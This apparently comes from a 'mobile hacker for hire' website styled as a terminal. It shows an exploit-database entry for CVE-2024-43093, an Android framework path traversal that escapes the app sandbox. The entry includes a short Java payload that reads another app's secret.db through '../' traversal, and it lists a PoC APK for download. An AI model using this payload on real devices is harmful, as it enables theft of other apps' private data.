[~]mobilehackerforhire$ hire --now
    cd ../exploit-db
    root@mhfh:~#cat /var/db/exploits/CVE-2024-43093.json
    exploits/CVE-2024-43093.md
    CVE-2024-43093AndroidSandboxHigh

    Framework path traversal sandbox escape

    affected
    12-15
    disclosed
    2024-11-04
    discovered
    2024-09-20
    patched
    November 2024 ASB
    author
    Google AOSP
    platform
    Android

    ## description

    Path traversal in the Android framework allows an attacker app to access files outside its sandbox in protected directories such as Android/data and Android/obb.

    ## impact

    Cross-app data exfiltration. Active exploitation reported by Google.

    ## mitigation

    Apply November 2024 Android security patch level.

    ## proof of concept

    // Path traversal payload
File f = new File(ctx.getExternalFilesDir(null),
  "../../../Android/data/com.victim/files/secret.db");
FileInputStream in = new FileInputStream(f);

    ## downloads

    cve-2024-43093-poc.apk
    Traversal PoC apk
    212 KB

    ## references